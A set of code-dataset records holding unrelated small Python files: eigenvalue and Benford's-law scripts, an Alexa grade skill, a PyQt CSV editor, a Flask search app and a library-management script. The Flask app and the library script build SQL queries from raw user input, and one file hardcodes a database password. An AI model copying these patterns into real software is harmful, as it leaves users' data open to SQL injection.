user.realm != self.realm():\n raise ValueError(\n \"Trying to authorize a user in the wrong realm, expected {}, got {}\".format(self.realm, user.realm)\n )\n\n attributes = {}\n\n for user_pattern, extra_attributes in self.user_attributes.items():\n if fnmatch.fnmatch(user.username, user_pattern):\n attributes.update(extra_attributes)\n\n for r in user.roles:\n attributes.update(self.user_attributes.get(r, {}))\n\n return attributes\n\n def collect_metric_info(self):\n return {}\n","repo_name":"ecmwf/polytope-server","sub_path":"polytope_server/common/authorization/plain_authorization.py","file_name":"plain_authorization.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23775612051","text":"import numpy as np\n\n\ndef func(a,x):\n \n for i in range(10):\n x = np.dot(a, x)\n x_n = x / x.min()\n print('Power method:')\n print('Eigenvector of matrix {} is {}:'.format(a, x_n))\n find_ray(a,x_n)\n print(\"\\n\")\n \ndef find_ray(a,x_n):\n h=np.dot(a,x_n)\n m=np.dot(h,x_n)\n \n x_2=np.dot(x_n,x_n)\n dom_eival=m/x_2\n print('Reyleigh quotient method:')\n print('The dominant eigen value for matrix {} is {:.2f}'.format(a.tolist(),dom_eival))\n print(\"\\n\\n\")\n \n\n\nab = np.array([[2, -12], \n [1, -5]]) \n\na=np.array([[2,1],[0,-4]]) \nx=np.array([1,1]) \nb=np.array([[-5,0,0],[3,7,0],[4,-2,3]])\nc=np.array([[1,2,-2],[-2,5,-2],[-6,6,-3]])\nx1=np.array([1,1,1])\nfunc(ab,x)\nfunc(a,x)\nfunc(b,x1)\nfunc(c,x1)","repo_name":"jddark62/SCL-2K22","sub_path":"WS2/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20541312068","text":"def Euclide(a, b):\n if b == 0:\n return a\n return Euclide(b, a % b)\n\n\nw = input().split()\nh = int(w[1])\nw = int(w[0])\nans = 1\nbuf = 1\nw -= 1\nh -= 1\ns = w + h\nfor m in range(min(w, h), 0, -1):\n ans *= s\n buf *= m\n e = Euclide(ans, buf)\n ans /= e\n buf /= e\n print(m, ans, buf, e)\n s -= 1\nans /= buf\nprint(int(ans % 1000000007))\n","repo_name":"Zu-rin/AtCoder","sub_path":"AtCoder_Beginner_Contest/ABC034/ABC034C.py","file_name":"ABC034C.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14944075744","text":"#!/usr/bin/python3\nimport pandas as pd\nfrom scipy.stats import chisquare, chi2\nfrom numpy import log10\n\nturno = ['1', '2']\nano = ['2014', '2018']\nestado = [\n \"AC\", \"AL\", \"AM\", \"AP\", \"BA\", \"CE\", \"DF\", \"ES\", \"GO\", \"MA\", \"MG\", \"MS\", \"MT\",\n \"PA\", \"PE\", \"PI\", \"PR\", \"RJ\", \"RN\", \"RO\", \"RR\", \"RS\", \"SC\", \"SE\", \"SP\", \"TO\",\n \"ZZ\"\n]\nnomeDoVotavel = []\ndirbase = \"eleicoes/\"\ncodificacao = \"ISO-8859-1\"\ndelimitador = \";\"\nfor a in ano:\n for t in turno:\n print(f\"TABELA TURNO {t} ANO {a}\\n\")\n arquivoFrequenciaRelativa = f\"{dirbase}{a}/frequencia-relativa-t{t}-{a}.csv\"\n frel = pd.read_csv(arquivoFrequenciaRelativa, encoding = codificacao, delimiter = delimitador) \n nomeDoVotavel = list(frel.columns)\n nomeDoVotavel = [nome.upper() for nome in nomeDoVotavel]\n retirar = [\"BRANCO\", \"NULO\", \"DÍGITO\"]\n for r in retirar:\n nomeDoVotavel.remove(r)\n\n nomeDoVotavel.append(\"BRANCO\")\n nomeDoVotavel.append(\"NULO\")\n for nome in nomeDoVotavel:\n print(f\"{nome} \", end = '')\n for fq in frel[nome]:\n print(f\"{fq:4.2f} \", end = '')\n\n print(\"\")\n\n print(\"\\n\")\n totalDeMunicipios = 0\n votosExtremos = {}\n for nome in nomeDoVotavel:\n votosExtremos[nome] = {\"MIN\": 1.0e+10, \"MAX\": -1.0e+10, \"QT_MUNICIPIOS\" : 0}\n\n print(f\"TABELA MÍNIMO E MÁXIMO DE VOTOS NO TURNO {t} ANO {a}\\n\")\n for es in estado:\n ap = f\"{dirbase}{a}/apuracao-t{t}-{a}-{es}.csv\"\n dfAux = pd.read_csv(ap, encoding = codificacao, delimiter = delimitador)\n totalDeMunicipiosNoEstado = len(dfAux[\"NM_MUNICIPIO\"].unique())\n totalDeMunicipios += totalDeMunicipiosNoEstado\n for nome in nomeDoVotavel:\n votos = dfAux.loc[(dfAux[\"NM_VOTAVEL\"] == nome) & (dfAux[\"QT_VOTOS\"] > 0)]\n if(len(votos) > 0):\n votosExtremos[nome][\"QT_MUNICIPIOS\"] += len(votos['NM_MUNICIPIO'].unique())\n votosMin = votos['QT_VOTOS'].min()\n votosMax = votos['QT_VOTOS'].max()\n if(votosMin < votosExtremos[nome][\"MIN\"]):\n votosExtremos[nome][\"MIN\"] = votosMin\n\n if(votosMax > votosExtremos[nome][\"MAX\"]):\n votosExtremos[nome][\"MAX\"] = votosMax\n\n for nome in votosExtremos.keys():\n print(f\"{nome} {votosExtremos[nome]['MIN']} {votosExtremos[nome]['MAX']} {(100.0*votosExtremos[nome]['QT_MUNICIPIOS']/totalDeMunicipios):5.2f}\")\n \n print(f\"Total de Municípios: {totalDeMunicipios}\\n\")\n print(f\"TESTE DE ADERÊNCIA TURNO {t} ANO {a}\")\n lfrel = []\n leiDeBenford = [100.0*(log10(x + 1) - log10(x)) for x in range(1, 10)]\n leiDeBenford[7] = leiDeBenford[7] + leiDeBenford[8]\n leiDeBenford.pop()\n degreeOfFreendom = len(leiDeBenford) - 1\n alfa = 0.05\n chiCritico = chi2.ppf(1 - alfa, degreeOfFreendom)\n print(f\"(chiCritico = {chiCritico:6.4f}, alfa = {alfa})\\n\")\n for nome in nomeDoVotavel:\n lfrel = frel.loc[0:6, nome]\n lfrel[7] = (frel.loc[7, nome] + frel.loc[8, nome])\n chi, p = chisquare(leiDeBenford, lfrel)\n if(chi < chiCritico):\n print(f\"{nome} Sucesso {chi:6.4f} {p:6.4f}\")\n else:\n print(f\"{nome} Falha {chi:6.4f} {p:6.4f}\")\n\n print(\"\")","repo_name":"lucaskrispim/Benford","sub_path":"gerarTabelas.py","file_name":"gerarTabelas.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15868725643","text":"from __future__ import print_function\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"GradePercentageIntent\":\n return get_percentage_grade(intent, session)\n if intent_name == \"GradePassIntent\":\n return get_pass_grade(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n# --------------- Functions that control the skill's behavior ------------------\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"Welcome to Exam Grade Estimator. \" \\\n \"Here you can determine how much you need to get in the exam to get your target mark \" \\\n \"in the course. Just ask, I am going into the exam with a 78 percent, what do I need on the 40 percent exam \" \\\n \"to get 82 percent in the course. Or, if you are the watch movies through exam type, just ask, \" \\\n \"I am going into the exam with a 65 percent, what do I need in order to pass the course\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Tell me the mark you want in the course \" \\\n \"and I will guess the grade you need on your exam based on the grade you have going into it.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for using the exam grade estimator. \" \\\n \"Good luck on your exams! \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef get_percentage_grade(intent, session):\n\n card_title = intent['name']\n session_attributes = {}\n should_end_session = True\n\n if 'current_grade' in intent['slots'] and 'exam_percentage' in intent['slots'] and 'desired_grade' in intent['slots']:\n if 'value' in intent['slots']['current_grade'] and 'value' in intent['slots']['exam_percentage'] and 'value' in intent['slots']['desired_grade']:\n\n current_grade = int(intent['slots']['current_grade']['value'])\n exam_percentage = int(intent['slots']['exam_percentage']['value'])\n desired_grade = int(intent['slots']['desired_grade']['value'])\n\n\n so_far_grade = float(current_grade)*(1 - exam_percentage/100.0)\n needed_exam_grade = float((desired_grade - so_far_grade))/exam_percentage\n percent_needed = str(needed_exam_grade*100)\n if (needed_exam_grade < 0):\n percent_needed = \"literally below 0\"\n\n\n speech_output = \"In order to get \" + str(desired_grade) + \" percent in the course, \" \\\n \"you need to get \" + percent_needed + \" percent on the exam.\" \n\n \n reprompt_text = \"Tell me the mark you want in the course \" \\\n \"and I will guess the grade you need on your exam based on the grade you have going into it.\"\n\n\n else:\n speech_output = \"Your command is incomplete. Please try again or ask for help.\"\n reprompt_text = \"Your command is incomplete. Please try again or ask for help.\"\n else:\n speech_output = \"I'm not sure what your question was. \" \\\n \"Please try again.\"\n reprompt_text = \"I'm not sure what your question was. \" \\\n \"Please try again.\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef get_pass_grade(intent, session):\n\n card_title = intent['name']\n session_attributes = {}\n should_end_session = True\n\n if 'current_grade' in intent['slots'] and 'exam_percentage' in intent['slots']:\n if 'value' in intent['slots']['current_grade'] and 'value' in intent['slots']['exam_percentage']:\n\n current_grade = int(intent['slots']['current_grade']['value'])\n exam_percentage = int(intent['slots']['exam_percentage']['value'])\n desired_grade = 50\n\n\n so_far_grade = float(current_grade)*(1 - exam_percentage/100.0)\n needed_exam_grade = float((desired_grade - so_far_grade))/exam_percentage\n percent_needed = str(needed_exam_grade*100)\n if (needed_exam_grade < 0):\n percent_needed = \"literally below 0\"\n\n\n speech_output = \"In order to pass the course, \" \\\n \"you need to get \" + percent_needed + \" percent on the exam.\" \n\n \n reprompt_text = \"Tell me the mark you want in the course \" \\\n \"and I will guess the grade you need on your exam based on the grade you have going into it.\"\n\n\n else:\n speech_output = \"Your command is incomplete. Please try again or ask for help.\"\n reprompt_text = \"Your command is incomplete. Please try again or ask for help.\"\n else:\n speech_output = \"I'm not sure what your question was. \" \\\n \"Please try again.\"\n reprompt_text = \"I'm not sure what your question was. \" \\\n \"Please try again.\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n# --------------- Helpers that build all of the responses ----------------------\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }","repo_name":"daquilnp/alexapi","sub_path":"ExamGradeEstimator/exam_grade_estimator.py","file_name":"exam_grade_estimator.py","file_ext":"py","file_size_in_byte":8961,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20596989651","text":"#!/usr/bin/env python3\n\n# https://webassembly.github.io/spec/core/appendix/index-instructions.html\n# https://webassembly.github.io/spec/core/appendix/index-types.html\n\nimport requests\n\nCORE_URL = 'https://webassembly.github.io/spec/core/appendix/index-instructions.html'\nWABT_KEYWORDS_URL=\\\n \"https://raw.githubusercontent.com/WebAssembly/wabt/main/src/lexer-keywords.txt\"\n\ndef get_keywords_wabt(url):\n response = requests.get(url)\n response.raise_for_status()\n content = response.text.strip().split('\\n')\n idx = content.index(next(line for line in content if '%%' in line))\n res = { 'keywords': [], 'types': [], 'ops': [] }\n kws, types, ops = [], [], []\n for line in sorted(content[idx+1:]):\n parts = line.lower().split(', ')\n if len(parts) == 2 and parts[1].startswith('type::'):\n res['types'].append(parts[0])\n elif len(parts) == 3 and parts[2].startswith('opcode::'):\n res['ops'].append(parts[0])\n else:\n res['keywords'].append(parts[0])\n return res\n\n\ndef fill_lines(lst, max_len=85):\n res, cur = [], \"\"\n for e in lst:\n if len(cur) + len(e) + 3 > max_len:\n res.append(cur)\n cur = \"\"\n cur += f\" '{e}'\"\n res.append(cur)\n return res\n\n\nif __name__ == '__main__':\n import sys\n kws = get_keywords_wabt(WABT_KEYWORDS_URL)\n assert(sum(len(x) for x in kws.values()) == 590)\n\n if len(sys.argv) > 1:\n print('\\n'.join(fill_lines(kws[sys.argv[1]])))\n else:\n for k, v in kws.items():\n print(k, '\\n', '\\n'.join(fill_lines(v)))\n","repo_name":"nverno/wat-ts-mode","sub_path":"script/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"7118306218","text":"import subprocess\nimport sys\nfrom pathlib import Path\n\nimport setuptools\n\nHERE = Path(__file__).parent.resolve()\n\n# The name of the project\nNAME = \"notebook\"\n\nlabext_name = \"@jupyter-notebook/lab-extension\"\nlab_extension_dest = HERE / NAME / \"labextension\"\nmain_bundle_dest = HERE / NAME / \"static\"\n\n# Representative files that should exist after a successful build\nensured_targets = [\n str(lab_extension_dest / \"static\" / \"style.js\"),\n str(main_bundle_dest / \"bundle.js\"),\n str(HERE / NAME / \"schemas/@jupyter-notebook/application-extension/package.json.orig\"),\n]\n\ndata_files_spec = [\n (\"share/jupyter/labextensions/%s\" % labext_name, str(lab_extension_dest), \"**\"),\n (\"share/jupyter/labextensions/%s\" % labext_name, str(HERE), \"install.json\"),\n (\"share/jupyter/lab/schemas\", f\"{NAME}/schemas\", \"@jupyter-notebook/**/*\"),\n (\n \"etc/jupyter/jupyter_server_config.d\",\n \"jupyter-config/jupyter_server_config.d\",\n \"notebook.json\",\n ),\n (\n \"etc/jupyter/jupyter_notebook_config.d\",\n \"jupyter-config/jupyter_notebook_config.d\",\n \"notebook.json\",\n ),\n]\n\ntry:\n from jupyter_packaging import get_data_files, npm_builder, wrap_installers\n\n # In develop mode, just run yarn\n builder = npm_builder(build_cmd=\"build\", npm=\"jlpm\", force=True)\n\n def post_develop(*args, **kwargs):\n builder(*args, **kwargs)\n try:\n subprocess.run([sys.executable, \"-m\", \"pre_commit\", \"install\"])\n subprocess.run(\n [sys.executable, \"-m\", \"pre_commit\", \"install\", \"--hook-type\", \"pre-push\"]\n )\n except Exception:\n pass\n\n cmdclass = wrap_installers(post_develop=post_develop, ensured_targets=ensured_targets)\n\n setup_args = dict(cmdclass=cmdclass, data_files=get_data_files(data_files_spec))\nexcept ImportError:\n setup_args = {}\n\n\nif __name__ == \"__main__\":\n setuptools.setup(**setup_args)\n","repo_name":"cbreland/altz","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18025287781","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 29 10:45:09 2018\n\n@author: 姜兴琪\n\"\"\"\n\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nimport csv\nwith open(r'etf_data/c510050.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',') \n hearder=next(readCSV)\n X = [] \n y = [] \n for row in readCSV: \n X.append(np.array(row[0:6]))\n y.append(int(row[-1])) \nX=np.array(X)\nX=X.astype(float)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3) \n\nX_train=np.array(X_train)\ny_train=np.array(y_train)\n\nX_test=np.array(X_test)\ny_test=np.array(y_test)\n\nprint (len(X_train),len(y_train))\nprint (len(X_test),len(y_test))\n\nfrom sklearn.tree import DecisionTreeClassifier\n# Train\nclf = DecisionTreeClassifier().fit(X_train, y_train)\na=clf.predict(X_test)\ns=0\nfor i in range(0,len(y_test)):\n if (a[i]-y_test[i])==0:\n s=s+1\nprint (s/len(y_test))","repo_name":"jxq0816/machine-learning-etf","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32474345712","text":"import sys\nimport csv\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QVBoxLayout, \\\n QComboBox, QFormLayout, QDialog, QLabel, QScrollArea, QHBoxLayout, QPushButton, QLineEdit, \\\n QAbstractItemView, QHeaderView, QFileDialog\nfrom PyQt5 import QtCore, QtGui\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\n# Create a QMainWindow subclass to represent the main application window\nclass MyWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n # Set the window title\n self.setWindowTitle(\"Load CSV File\")\n\n # Create a central widget for the main window\n self.central_widget = QWidget(self)\n self.setCentralWidget(self.central_widget)\n\n # Initialize the user interface\n self.init_ui()\n\n def init_ui(self):\n layout = QVBoxLayout()\n\n # Create a QLineEdit widget for entering the file path\n self.input = QLineEdit(self)\n layout.addWidget(self.input)\n\n # Create a \"Browse File\" button and connect it to the load_button_handler method\n self.load_button = QPushButton(\"Browse File\", self)\n self.load_button.clicked.connect(self.load_button_handler)\n layout.addWidget(self.load_button)\n\n # Set the layout for the central widget\n self.central_widget.setLayout(layout)\n\n # Initialize an empty data attribute\n self.data = []\n\n def load_button_handler(self):\n print(\"Load Initiated\")\n \n # Open a file dialog to select a CSV file\n file_path, _ = QFileDialog.getOpenFileName()\n \n if file_path:\n # Read the CSV file and its headers\n self.data, headers = self.read_csv_file(file_path)\n \n if self.data:\n # Open a custom dialog to customize the CSV data\n self.open_combo_box_dialog(headers)\n\n def read_csv_file(self, file_path):\n data = []\n headers = []\n try:\n with open(file_path, 'r') as infile:\n # Use the csv module to read the CSV file\n csv_reader = csv.reader(infile, delimiter=\",\")\n headers = next(csv_reader) # Get column headers\n data = list(csv_reader)\n except Exception as e:\n print(f\"Error reading CSV file: {str(e)}\")\n return data, headers\n\n def open_combo_box_dialog(self, headers):\n dialog = ComboBoxDialog(headers, self.data)\n dialog.setWindowTitle(\"Customize CSV Data\")\n dialog.exec_()\n\n# Create a custom QDialog subclass for customizing the CSV data\nclass ComboBoxDialog(QDialog):\n def __init__(self, headers, data):\n super().__init__()\n\n layout = QVBoxLayout()\n\n # Create \"Save Changes\" and \"Export File\" buttons\n self.save_button = QPushButton(\"Save Changes\", self)\n self.save_button.adjustSize()\n self.export_button = QPushButton(\"Export File\", self)\n self.export_button.adjustSize()\n \n # Connect button clicks to corresponding methods\n self.save_button.clicked.connect(self.save_button_handler)\n self.export_button.clicked.connect(self.export_button_handler)\n\n # Add buttons to the layout\n layout.addWidget(self.save_button)\n layout.addWidget(self.export_button)\n\n self.setLayout(layout)\n\n # Create a scroll area to display the CSV data\n self.scroll_area = QScrollArea()\n layout.addWidget(self.scroll_area)\n\n # Create a form layout for arranging widgets\n self.form_layout = QFormLayout()\n self.scroll_area.setWidgetResizable(True)\n self.scroll_area.setWidget(QWidget()) # Initialize the scroll area's widget\n \n self.combo_boxes = []\n self.text_entries = []\n self.currentVal = []\n self.headers = headers\n\n # Add labels for column headers\n header_row = QHBoxLayout()\n for header in headers:\n header_label = QLabel(header, self) # Create a label for each column header\n header_row.addWidget(header_label)\n\n # Add the header row to the form layout\n self.form_layout.addRow(header_row)\n\n # Populate the dialog with combo boxes and text entry fields\n self.populateComboBoxes(data)\n\n container_widget = QWidget()\n container_widget.setLayout(self.form_layout)\n self.scroll_area.setWidget(container_widget)\n\n # Populate the dialog with combo boxes and text entry fields\n def populateComboBoxes(self, data):\n for row in data:\n row_layout = QHBoxLayout()\n for col, value in enumerate(row):\n if col in [1, 2, 4, 5]: # Check if the column index should be a text entry\n text_entry = QLineEdit(self)\n text_entry.setText(value)\n text_entry.adjustSize()\n text_entry.setStyleSheet('background-color:yellow;')\n self.combo_boxes.append(text_entry)\n row_layout.addWidget(text_entry)\n else:\n combo_box = QComboBox(self)\n combo_box.setStyleSheet('background-color:aqua;')\n combo_box.addItems(set(data[i][col] for i in range(len(data))))\n combo_box.setCurrentText(value)\n self.combo_boxes.append(combo_box)\n row_layout.addWidget(combo_box)\n self.form_layout.addRow(row_layout)\n\n # Handle the \"Save Changes\" button click\n def save_button_handler(self):\n print(\"SAVING CURRENT EDITS\")\n self.currentVal = []\n for combo_box in self.combo_boxes:\n try:\n currText = combo_box.currentText()\n except AttributeError:\n currText = combo_box.text()\n self.currentVal.append(currText)\n print(\"Current Values:\", self.currentVal)\n\n def export_button_handler(self):\n print(\"EXPORTING FILE\")\n \n # Specify the desired file path for the exported CSV file\n file_path = \"exported_data.csv\"\n \n with open(file_path, 'w', newline='') as csvfile:\n csv_writer = csv.writer(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n # Write the headers\n csv_writer.writerow(self.headers)\n\n # Write the current values\n for i in range(0, len(self.currentVal), 6):\n row = self.currentVal[i:i + 6] # 6 columns for each of the rows and their headers\n csv_writer.writerow(row)\n\n print(\"Data has been exported to\", file_path)\n\n# Define the main function to run the application\ndef main():\n app = QApplication(sys.argv)\n window = MyWindow()\n window.resize(400, 100)\n window.show()\n sys.exit(app.exec_())\n\n# Entry point of the script\nif __name__ == \"__main__\":\n main()\n","repo_name":"OmarFloresE/Customizable-CSV-Parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14959672322","text":"from flask import Flask, render_template, request\nfrom psycopg2 import connect\nimport wikipedia\n\nwikipedia.set_lang(\"es\")\napp = Flask(__name__)\n\nconn = connect(\n dbname='postgres',\n user='postgres',\n password='1234',\n host='localhost'\n )\ncursor = conn.cursor()\n\ndef orden(lista):\n return int(lista[1])\n \n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/Busqueda', methods=['POST']) \ndef NuevaVenta():\n if request.method == 'POST':\n resultados = []\n palabra = request.form['palabra']\n query = \"SELECT documentos FROM buscador WHERE palabra = '\"+palabra+\"';\"\n cursor.execute(query)\n paginas = cursor.fetchall()\n if paginas != []:\n paginas = paginas[0][0].split(') (')\n paginas[0] = paginas[0].replace('(','')\n paginas[-1] = paginas[-1].replace(')','')\n for x in paginas:\n x = x.split(',')\n x[1] = x[1].replace(' ','')\n resultados.append(x)\n resultados.sort(key=orden, reverse=True)\n\n for x in range(len(resultados)):\n page = wikipedia.page(resultados[x][0])\n resultados[x].append(page.url)\n resultados[x].append(page.title)\n\n return render_template('index.html', paginas=resultados)\n \n return render_template('index.html')\n\nif __name__== \"__main__\":\n app.run(debug = True)","repo_name":"gndonoso/Tarea3SD","sub_path":"cliente/api_cliente.py","file_name":"api_cliente.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31684556328","text":"\"\"\"\nmysql interaction and other main functions for the main.py file.\n\"\"\"\nimport os\nimport yaml\nimport mysql.connector\nimport random\nimport secrets\nimport json\nimport time\nimport string\n\n# -----------TABLE NAME--------------\nUSER_TABLE = 'lms_users' # allowed users table\nBOOKS_TABLE = 'books' # main library books catalog table\nDEBUG_TABLE = 'test_books' # table used temporarily for testing \n# ------------------------------------\n\ndef main_cnx(user_id='user'):\n \"\"\"\n function that returns the login connection using the\n cnx_data.yml file\n \"\"\"\n # changing to the data directory\n try:\n if os.path.exists('cnx_data.yml') is False:\n # os.chdir('..')\n os.chdir('data')\n with open('cnx_data.yml') as data_file:\n data = yaml.load(data_file, yaml.SafeLoader)\n\n cnx = mysql.connector.connect(**data[user_id])\n return cnx\n except FileNotFoundError:\n # if the data directory is not found in the current directory\n # print that the\n print(\"FATAL ERROR :The directory 'data' does not exists please recover the data directory\")\n exit()\n\n\ndef pass_checker(user_data):\n \"\"\"\n checking the user input to the registered users\n in the database\n :return: boolean value\n \"\"\"\n # starting the defined connection using the main_cnx() function\n cnx = main_cnx()\n\n cursor = cnx.cursor()\n # executing the command using execute statement\n\n cursor.execute(f'select * from {USER_TABLE}')\n # getting the data in the desired form\n database_data = cursor.fetchall()\n\n # checking the database from the file data\n if user_data in database_data:\n return True\n else:\n # return false as the value if the password is wrong\n return False\n\n\ndef display(table_name='books'):\n \"\"\"\n show the books, isbn author from the database\n :param table_name:\n :return:\n \"\"\"\n # initiating the connection\n cnx = main_cnx()\n cursor = cnx.cursor()\n\n # executing the sql statement for the data\n cursor.execute(f\"select * from {table_name}\")\n\n # printing the data form stored in the cursor\n for lines in cursor:\n print(f'{lines[0]:14} {lines[1]:45}by {lines[2]}')\n\n\ndef search_on_isbn(isbn_number: str):\n \"\"\"\n searching using the isbn of the book\n :return:\n \"\"\"\n cnx = main_cnx()\n cursor = cnx.cursor()\n if isbn_number.isnumeric():\n cursor.execute(f\"select * from {BOOKS_TABLE} where isbn = {isbn_number!r}\")\n # fetching the data from the database\n data = cursor.fetchall()\n # checking for empty data\n if not data:\n print(f\"Sorry no book is found having ISBN {isbn_number}\")\n else:\n # if the book is found print found\n print('Found')\n print(f\"\"\"\n ISBN: {data[0][0]}\n Title: {data[0][1]}\n Author: {data[0][2]}\n Published: {data[0][3]}\"\"\")\n else:\n print(\"Please enter a number to search\")\n\n\ndef search_on_author(author_name: str):\n \"\"\"\n searching function using the author name\n :return:\n \"\"\"\n\n cnx = main_cnx()\n cursor = cnx.cursor()\n cursor.execute(f\"SELECT book_name, published from {BOOKS_TABLE} where author = {author_name!r}\")\n data = cursor.fetchall()\n # printing the data retrieved from database\n # listing of the all the books from the author\n if data:\n print(f\"Books by {author_name}\")\n print(f\"Title {'-'*35}Publishing date\")\n for books in data:\n print(f\"{books[0]:40} {books[1]:5}\")\n else:\n print(f\"Author {author_name!r} not found\\nPlease check for any typos in the author name and try again\")\n\n\ndef search_on_title(book_name: str):\n \"\"\"\n searching the books in the database using the sql query like functionality\n :param book_name:\n :return:\n \"\"\"\n\n cnx = main_cnx()\n cursor = cnx.cursor()\n\n # executing the query for searching the books database using the title of the book\n cursor.execute(f\"SELECT book_name, published, author from {BOOKS_TABLE} where book_name like {book_name+'%'!r}\")\n\n # get the returned data and store it in the data variable\n data = cursor.fetchall()\n\n # if there is data in the variable data\n if data:\n print(\"Found\")\n for books in data:\n print(f\"{books[0]:40} {books[1]}, by {books[2]}\")\n\n return True\n\n # else if the value is not found give this message\n else:\n print(f\"Not Found with title {book_name!r}\")\n return False\n\n\ndef add_books(verify_user):\n \"\"\"\n Adding the books by the user as a contribution to the project database\n helping it to grow to a more vast book library\n :param verify_user:\n :return:\n \"\"\"\n if pass_checker(verify_user) is False:\n print(\"Sorry the credentials are wrong\")\n else:\n cnx = main_cnx()\n # making the cursor\n cursor = cnx.cursor()\n # asking the details of the books by the valid user\n while True:\n try:\n print(\"Enter the following details of the book exit to leave \\n\")\n ask_isbn = input(\"Enter the isbn number \").strip().casefold()\n if ask_isbn in ['exit', 'quit']:\n break\n ask_book_name = input(\"Enter the book name \").strip()\n ask_author = input(f\"Enter the Author of the book {ask_book_name!r} \").title().strip()\n ask_year = input(\"Enter the year of publishing \")\n # if no exception occurs break the loop\n # ------tmp-----##\n cursor.execute(f\"insert into {DEBUG_TABLE} values ({ask_isbn!r}, {ask_book_name!r}, {ask_author!r},\"\n f\" {ask_year})\")\n # executing the changes to the table\n cnx.commit()\n print(\"*Successfully* added the book to the 